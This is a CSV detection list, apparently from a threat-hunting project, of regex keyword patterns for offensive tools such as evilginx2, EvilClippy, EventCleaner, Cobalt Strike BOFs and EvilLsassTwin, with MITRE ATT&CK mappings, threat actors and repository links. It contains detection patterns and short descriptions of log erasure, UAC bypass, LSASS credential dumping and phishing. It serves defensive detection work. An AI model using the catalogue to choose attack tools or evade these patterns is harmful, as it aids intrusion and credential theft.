*",".{0,1000}EventCleaner\.exe\s.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*EventCleaner.iobj*",".{0,1000}EventCleaner\.iobj.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*EventCleaner\Debug\*",".{0,1000}EventCleaner\\Debug\\.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*eventlog -risk-i-know*",".{0,1000}eventlog\s\-risk\-i\-know.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*eventlog_dos.exe*",".{0,1000}eventlog_dos\.exe.{0,1000}","offensive_tool_keyword","EventLogCrasher","crash the Windows Event Log service of any other Windows 10/Windows Server 2022 machine on the same domain","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/floesen/EventLogCrasher","1","1","N/A","10","2","164","28","2024-01-23T14:04:23Z","2024-01-23T09:27:27Z" "*eventlog_fucker.py*",".{0,1000}eventlog_fucker\.py.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*EventLogCrasher.exe*",".{0,1000}EventLogCrasher\.exe.{0,1000}","offensive_tool_keyword","EventLogCrasher","crash the Windows Event Log service of any other Windows 10/Windows Server 2022 machine on the same domain","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/floesen/EventLogCrasher","1","1","N/A","10","2","164","28","2024-01-23T14:04:23Z","2024-01-23T09:27:27Z" "*EventLogCrasher-main*",".{0,1000}EventLogCrasher\-main.{0,1000}","offensive_tool_keyword","EventLogCrasher","crash the Windows Event Log service of any other Windows 10/Windows Server 2022 machine on the same domain","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/floesen/EventLogCrasher","1","1","N/A","10","2","164","28","2024-01-23T14:04:23Z","2024-01-23T09:27:27Z" "*eventlog-fucker.py*",".{0,1000}eventlog\-fucker\.py.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*eventspy.cna*",".{0,1000}eventspy\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","10","10","306","84","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z" "*EventSub-Aggressor.*",".{0,1000}EventSub\-Aggressor\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","318","52","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" "*EventViewerRCE.ps1*",".{0,1000}EventViewerRCE\.ps1.{0,1000}","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","1","N/A","10","2","157","22","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" "*EventViewerUAC.*",".{0,1000}EventViewerUAC\..{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","112","35","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" "*EventViewerUAC.*",".{0,1000}EventViewerUAC\..{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/EventViewerUAC_BOF","1","1","N/A","10","10","128","30","2022-05-06T17:43:05Z","2022-05-02T02:08:52Z" "*EventViewerUAC.x64*",".{0,1000}EventViewerUAC\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","112","35","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" "*EventViewerUAC.x86*",".{0,1000}EventViewerUAC\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","112","35","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" "*EventViewerUAC_BOF*",".{0,1000}EventViewerUAC_BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/EventViewerUAC_BOF","1","1","N/A","10","10","128","30","2022-05-06T17:43:05Z","2022-05-02T02:08:52Z" "*eventvwr_elevator*",".{0,1000}eventvwr_elevator.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","852","195","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*-EventVwrBypass*",".{0,1000}\-EventVwrBypass.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1118","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*evilclippy *",".{0,1000}evilclippy\s.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*EvilClippy.exe*",".{0,1000}EvilClippy\.exe.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","2051","385","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z" "*EvilClippy.exe*",".{0,1000}EvilClippy\.exe.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*EvilClippyManager.*",".{0,1000}EvilClippyManager\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*EvilClippy-master*",".{0,1000}EvilClippy\-master.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","2051","385","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z" "*EvilClippyMenu*",".{0,1000}EvilClippyMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*evilfeed.go*",".{0,1000}evilfeed\.go.{0,1000}","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1475","287","2024-05-01T19:00:30Z","2022-09-07T02:47:43Z" "*evilginx -p*",".{0,1000}evilginx\s\-p.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","0","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*evilginx*",".{0,1000}evilginx.{0,1000}","offensive_tool_keyword","evilginx2","evilginx2 is a man-in-the-middle attack framework used for phishing login credentials along with session cookies. which in turn allows to bypass 2-factor authentication protection.This tool is a successor to Evilginx. released in 2017. which used a custom version of nginx HTTP server to provide man-in-the-middle functionality to act as a proxy between a browser and phished website. Present version is fully written in GO as a standalone application. which implements its own HTTP and DNS server. making it extremely easy to set up and use","T1556 - T1565 - T1056 - T1558 - T1110","TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","0","N/A","7","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*evilginx.exe*",".{0,1000}evilginx\.exe.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*evilginx2*",".{0,1000}evilginx2.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*Evilginx2-Phishlets*",".{0,1000}Evilginx2\-Phishlets.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/Evilginx2-Phishlets","1","0","N/A","10","5","449","214","2023-12-12T08:00:52Z","2020-05-13T05:58:43Z" "*evilginx-linux*",".{0,1000}evilginx\-linux.{0,1000}","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1475","287","2024-05-01T19:00:30Z","2022-09-07T02:47:43Z" "*evilginx-mastery*",".{0,1000}evilginx\-mastery.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*evilgophish*",".{0,1000}evilgophish.{0,1000}","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1475","287","2024-05-01T19:00:30Z","2022-09-07T02:47:43Z" "*evilgrade*",".{0,1000}evilgrade.{0,1000}","offensive_tool_keyword","evilgrade","Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. It comes with pre-made binaries (agents). a working default configuration for fast pentests. and has its own WebServer and DNSServer modules. Easy to set up new settings. and has an autoconfiguration when new binary agents are set","T1565 - T1566 - T1573 - T1203 - T1210 - T1211 - T1212","TA0002 - ","N/A","N/A","Frameworks","https://github.com/infobyte/evilgrade","1","0","N/A","10","10","1254","275","2021-09-01T17:08:27Z","2013-04-22T16:08:48Z" "*EvilLsassTwin.exe*",".{0,1000}EvilLsassTwin\.exe.{0,1000}","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*EvilLsassTwin.exe*",".{0,1000}EvilLsassTwin\.exe.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*EvilLsassTwin.nim*",".{0,1000}EvilLsassTwin\.nim.{0,1000}","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*EvilLsassTwin.nim*",".{0,1000}EvilLsassTwin\.nim.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*evilmog/ntlmv1-multi*",".{0,1000}evilmog\/ntlmv1\-multi.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*EvilnoVNC by @JoelGMSec*",".{0,1000}EvilnoVNC\sby\s\@JoelGMSec.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "*EvilnoVNC Server*",".{0,1000}EvilnoVNC\sServer.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "*EvilnoVNC-main*",".{0,1000}EvilnoVNC\-main.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","1","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "*EvilnoVNC-main*",".{0,1000}EvilnoVNC\-main.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","1","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "*eviloffice.exe *",".{0,1000}eviloffice\.exe\s.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","0","N/A","10","10","2051","385","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z" "*eviloffice.exe*",".{0,1000}eviloffice\.exe.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","2051","385","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z" "*EvilPayload.ps1*",".{0,1000}EvilPayload\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - 